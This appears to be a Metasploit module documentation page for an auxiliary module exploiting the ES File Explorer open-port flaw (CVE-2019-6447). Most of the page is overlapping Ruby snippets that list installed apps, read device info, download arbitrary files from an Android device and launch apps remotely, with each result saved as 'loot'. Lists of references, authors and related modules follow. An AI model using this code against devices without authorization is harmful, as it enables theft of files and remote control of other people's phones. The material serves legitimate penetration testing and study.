151: print_error("#{peer}- Error Connecting")
152: return
153: end
154: unless res.code == 200
155: print_error("#{peer}- Not Vulnerable or Bad Response")
156: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
150: unless res
151: print_error("#{peer}- Error Connecting")
152: return
153: end
154: unless res.code == 200
155: print_error("#{peer}- Not Vulnerable or Bad Response")
156: return
157: end
158: path = store_loot('listApps.json', 'application/json', target_host, res.body, 'es_file_explorer_listapps.json')
159: vprint_good("#{peer}- Result saved to #{path}")
160: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
164: end
165: print_good(pretty_response)
166: when action.name == 'LISTAPPSSYSTEM'
167: res = http_post('listAppsSystem')
168: unless res
169: print_error("#{peer}- Error Connecting")
170: return
171: end
172: unless res.code == 200
173: print_error("#{peer}- Not Vulnerable or Bad Response")
174: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
168: unless res
169: print_error("#{peer}- Error Connecting")
170: return
171: end
172: unless res.code == 200
173: print_error("#{peer}- Not Vulnerable or Bad Response")
174: return
175: end
176: path = store_loot('listAppsSystem.json', 'application/json', target_host, res.body, 'es_file_explorer_listappssystem.json')
177: vprint_good("#{peer}- Result saved to #{path}")
178: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
182: end
183: print_good(pretty_response)
184: when action.name == 'LISTAPPSPHONE'
185: res = http_post('listAppsPhone')
186: unless res
187: print_error("#{peer}- Error Connecting")
188: return
189: end
190: unless res.code == 200
191: print_error("#{peer}- Not Vulnerable or Bad Response")
192: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
186: unless res
187: print_error("#{peer}- Error Connecting")
188: return
189: end
190: unless res.code == 200
191: print_error("#{peer}- Not Vulnerable or Bad Response")
192: return
193: end
194: path = store_loot('listAppsPhone.json', 'application/json', target_host, res.body, 'es_file_explorer_listappsphone.json')
195: vprint_good("#{peer}- Result saved to #{path}")
196: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
200: end
201: print_good(pretty_response)
202: when action.name == 'LISTAPPSSDCARD'
203: res = http_post('listAppsSdcard')
204: unless res
205: print_error("#{peer}- Error Connecting")
206: return
207: end
208: unless res.code == 200
209: print_error("#{peer}- Not Vulnerable or Bad Response")
210: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
204: unless res
205: print_error("#{peer}- Error Connecting")
206: return
207: end
208: unless res.code == 200
209: print_error("#{peer}- Not Vulnerable or Bad Response")
210: return
211: end
212: path = store_loot('listAppsSdcard.json', 'application/json', target_host, res.body, 'es_file_explorer_listappssdcard.json')
213: vprint_good("#{peer}- Result saved to #{path}")
214: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
218: end
219: print_good(pretty_response)
220: when action.name == 'LISTAPPSALL'
221: res = http_post('listAppsAll')
222: unless res
223: print_error("#{peer}- Error Connecting")
224: return
225: end
226: unless res.code == 200
227: print_error("#{peer}- Not Vulnerable or Bad Response")
228: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
222: unless res
223: print_error("#{peer}- Error Connecting")
224: return
225: end
226: unless res.code == 200
227: print_error("#{peer}- Not Vulnerable or Bad Response")
228: return
229: end
230: path = store_loot('listAppsAll.json', 'application/json', target_host, res.body, 'es_file_explorer_listappsall.json')
231: vprint_good("#{peer}- Result saved to #{path}")
232: json_resp = JSON.parse(sanitize_json(res.body))
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
236: end
237: print_good(pretty_response)
238: when action.name == 'GETDEVICEINFO'
239: res = http_post('getDeviceInfo')
240: unless res
241: print_error("#{peer}- Error Connecting")
242: return
243: end
244: unless res.code == 200
245: print_error("#{peer}- Not Vulnerable or Bad Response")
246: return
<PEER>- Not Vulnerable or Bad Response
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable or Bad Response" error message:
unless res
  print_error("#{peer}- Error Connecting")
  return
end
unless res.code == 200
  print_error("#{peer}- Not Vulnerable or Bad Response")
  return
end
path = store_loot('getDeviceInfo.json', 'application/json', target_host, res.body, 'es_file_explorer_getdeviceinfo.json')
vprint_good("#{peer}- Result saved to #{path}")
json_resp = JSON.parse(sanitize_json(res.body))
Action item is a path for GETFILE, like /system/app/Browser.apk
Here is a relevant code snippet related to the "Action item is a path for GETFILE, like /system/app/Browser.apk" error message:
  vprint_good("#{peer}- Result saved to #{path}")
  json_resp = JSON.parse(sanitize_json(res.body))
  print_good("#{peer}- Name: #{json_resp['name']}")
when action.name == 'GETFILE'
  unless datastore['ACTIONITEM'].start_with?('/')
    print_error('Action item is a path for GETFILE, like /system/app/Browser.apk')
  end
  res = send_request_raw(
    'uri' => datastore['ACTIONITEM'],
    'method' => 'GET',
    'ctype' => 'application/json',
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
  'uri' => datastore['ACTIONITEM'],
  'method' => 'GET',
  'ctype' => 'application/json',
)
unless res
  print_error("#{peer}- Error Connecting")
  return
end
unless res.code == 200
  print_error("#{peer}- Not Vulnerable, Bad Response. File may not be available for download.")
  return
<PEER>- Not Vulnerable, Bad Response. File may not be available for download.
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable, Bad Response. File may not be available for download." error message:
  unless res
    print_error("#{peer}- Error Connecting")
    return
  end
  unless res.code == 200
    print_error("#{peer}- Not Vulnerable, Bad Response. File may not be available for download.")
    return
  end
  path = store_loot('getFile', 'application/octet-stream', target_host, res.body, datastore['ACTIONITEM'])
  print_good("#{peer}- #{datastore['ACTIONITEM']} saved to #{path}")
when action.name == 'APPLAUNCH'
Action item is a path for GETFILE, like com.android.chrome
Here is a relevant code snippet related to the "Action item is a path for GETFILE, like com.android.chrome" error message:
  end
  path = store_loot('getFile', 'application/octet-stream', target_host, res.body, datastore['ACTIONITEM'])
  print_good("#{peer}- #{datastore['ACTIONITEM']} saved to #{path}")
when action.name == 'APPLAUNCH'
  if datastore['ACTIONITEM'].empty?
    print_error('Action item is a path for GETFILE, like com.android.chrome')
  end
  res = send_request_raw(
    'uri' => '/',
    'method' => 'POST',
    'data' => "{ \"command\":appLaunch, \"appPackageName\":#{datastore['ACTIONITEM']} }",
<PEER>- Error Connecting
Here is a relevant code snippet related to the "<PEER>- Error Connecting" error message:
  'method' => 'POST',
  'data' => "{ \"command\":appLaunch, \"appPackageName\":#{datastore['ACTIONITEM']} }",
  'ctype' => 'application/json',
)
unless res
  print_error("#{peer}- Error Connecting")
  return
end
unless res.code == 200
  print_error("#{peer}- Not Vulnerable, Bad Response. File may not be available for download.")
  return
<PEER>- Not Vulnerable, Bad Response. File may not be available for download.
Here is a relevant code snippet related to the "<PEER>- Not Vulnerable, Bad Response. File may not be available for download." error message:
unless res
  print_error("#{peer}- Error Connecting")
  return
end
unless res.code == 200
  print_error("#{peer}- Not Vulnerable, Bad Response. File may not be available for download.")
  return
end
if res.body.include?('NameNotFoundException')
  print_error("#{peer}- Application #{datastore['ACTIONITEM']} not found on device")
  return
<PEER>- Application <ACTIONITEM> not found on device
Here is a relevant code snippet related to the "<PEER>- Application <ACTIONITEM> not found on device" error message:
  unless res.code == 200
    print_error("#{peer}- Not Vulnerable, Bad Response. File may not be available for download.")
    return
  end
  if res.body.include?('NameNotFoundException')
    print_error("#{peer}- Application #{datastore['ACTIONITEM']} not found on device")
    return
  elsif res.body.include?('{"result":"0"}')
    print_good("#{peer}- #{datastore['actionitem']} launched successfully")
  end
end
Related Pull Requests
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #11625 Merged Pull Request: es file explorer open port CVE-2019-6447
References
- CVE-2019-6447
- https://www.ms509.com/2016/03/01/es-explorer-vul/
- https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
- https://twitter.com/fs0c131y/status/1085460755313508352
See Also
Check also the following modules related to this module:
- auxiliary/dos/windows/ftp/filezilla_server_port
- auxiliary/admin/upnp/soap_portmapping
- auxiliary/dos/mdns/avahi_portzero
- auxiliary/scanner/misc/sunrpc_portmapper
- auxiliary/scanner/natpmp/natpmp_portscan
- auxiliary/scanner/portmap/portmap_amp
- auxiliary/scanner/portscan/ack
- auxiliary/scanner/portscan/ftpbounce
- auxiliary/scanner/portscan/syn
- auxiliary/scanner/portscan/tcp
- auxiliary/scanner/portscan/xmas
- auxiliary/scanner/sap/sap_router_portscanner
- exploit/windows/ftp/sasser_ftpd_port
- exploit/windows/ftp/turboftp_port
- exploit/windows/ftp/vermillion_ftpd_port
- payload/aix/ppc/shell_find_port
- payload/bsdi/x86/shell_find_port
- payload/bsd/x86/shell_find_port
- payload/linux/ppc64/shell_find_port
- payload/linux/ppc/shell_find_port
- payload/linux/x64/shell_bind_tcp_random_port
- payload/linux/x64/shell_find_port
- payload/linux/x86/shell_bind_tcp_random_port
- payload/linux/x86/shell_find_port
- payload/osx/x86/shell_find_port
- payload/solaris/sparc/shell_find_port
- payload/solaris/x86/shell_find_port
- post/windows/manage/portproxy
- post/windows/recon/outbound_ports
- exploit/unix/webapp/nagios_graph_explorer
Authors
- 小荷才露尖尖角
- moonbocal
- fs0c131y
- h00die
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.